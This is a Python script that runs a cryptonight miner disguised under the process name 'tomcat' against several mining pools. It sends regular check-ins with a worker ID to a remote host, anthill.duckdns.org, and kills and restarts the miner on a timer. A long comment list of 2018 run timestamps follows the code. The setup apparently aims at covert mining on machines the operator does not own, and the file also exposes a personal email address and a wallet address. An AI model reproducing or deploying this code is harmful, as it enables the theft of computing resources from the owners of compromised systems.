import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:01.789684
#2018-02-17 17:21:01.511725
#2018-02-17 19:09:01.276373
#2018-02-17 20:57:05.150500
#2018-02-17 22:43:07.096300
#2018-02-18 00:28:06.500240
#2018-02-18 02:19:01.612382
#2018-02-18 04:06:01.791808
#2018-02-18 05:55:02.901004
#2018-02-18 07:47:01.920829
#2018-02-18 09:35:06.808345
#2018-02-18 11:21:02.164094
#2018-02-18 13:07:01.259633
#2018-02-18 14:54:07.319688
#2018-02-18 16:43:04.698111
#2018-02-18 18:31:04.895885
#2018-02-18 20:18:07.810095
#2018-02-18 22:03:04.699231
#2018-02-18 23:51:06.482185
#2018-02-19 01:37:06.605925
#2018-02-19 03:25:09.016656
#2018-02-19 05:10:01.834955
#2018-02-19 06:54:08.113024
#2018-02-19 08:42:06.577018
#2018-02-19 10:31:06.886105
#2018-02-19 12:19:05.160889
#2018-02-19 14:06:04.055669
#2018-02-19 15:54:07.354142
#2018-02-19 17:42:06.279482
#2018-02-19 19:30:07.309987
#2018-02-19 21:17:05.797557
#2018-02-19 23:05:08.062785
#2018-02-20 00:48:07.334690
#2018-02-20 02:39:05.361266
#2018-02-20 04:28:04.827447
#2018-02-20 06:12:04.680503
#2018-02-20 07:57:01.584297
#2018-02-20 09:42:09.110412
#2018-02-20 11:26:07.213362
#2018-02-20 13:12:07.925771
#2018-02-20 14:57:07.185226
#2018-02-20 16:43:06.269918
#2018-02-20 18:29:04.192847
#2018-02-20 20:21:05.471415
#2018-02-20 22:07:07.201410
#2018-02-20 23:48:03.435439
#2018-02-21 01:34:04.183714
#2018-02-21 03:23:04.116199
#2018-02-21 05:10:01.426515
#2018-02-21 06:57:06.146365
#2018-02-21 08:43:06.788217
#2018-02-21 10:28:08.013217
#2018-02-21 12:22:06.013950
#2018-02-21 14:08:07.809991
#2018-02-21 15:54:10.601405
#2018-02-21 17:47:02.037094
#2018-02-21 19:32:08.685270
#2018-02-21 21:21:04.811254
#2018-02-21 23:09:04.218285
#2018-02-22 00:58:08.042442
#2018-02-22 02:46:07.259436
#2018-02-22 04:32:05.634447
#2018-02-22 06:18:01.237731
#2018-02-22 08:04:03.759297
#2018-02-22 09:52:07.140161
#2018-02-22 11:38:07.174021
#2018-02-22 13:25:08.349546
#2018-02-22 15:14:01.675031
#2018-02-22 16:58:05.998372
#2018-02-22 18:46:08.516211
#2018-02-22 20:38:01.362568
#2018-02-22 22:23:07.084740
#2018-02-23 00:10:09.117621
#2018-02-23 01:58:07.093351
#2018-02-23 03:46:06.402934
#2018-02-23 05:39:06.417507
#2018-02-23 07:24:04.807866
#2018-02-23 09:27:07.491412
#2018-02-23 11:33:02.201749
#2018-02-23 13:23:07.952061
#2018-02-23 15:10:10.572280
#2018-02-23 17:00:05.680869
#2018-02-23 18:49:08.749781
#2018-02-23 20:36:06.738995
#2018-02-23 22:23:02.056083
#2018-02-24 00:09:06.138486
#2018-02-24 02:01:01.451625
#2018-02-24 03:51:01.297992
#2018-02-24 05:36:06.275741
#2018-02-24 07:22:07.118373
#2018-02-24 09:13:06.051300
#2018-02-24 11:08:01.904630
#2018-02-24 12:57:03.938991
#2018-02-24 14:45:06.113882
#2018-02-24 16:37:04.458300
#2018-02-24 18:26:05.359474
#2018-02-24 20:13:07.129364
#2018-02-24 22:02:03.619492
#2018-02-25 01:00:07.646451
#2018-02-25 04:42:06.336210
#2018-02-25 08:41:01.733655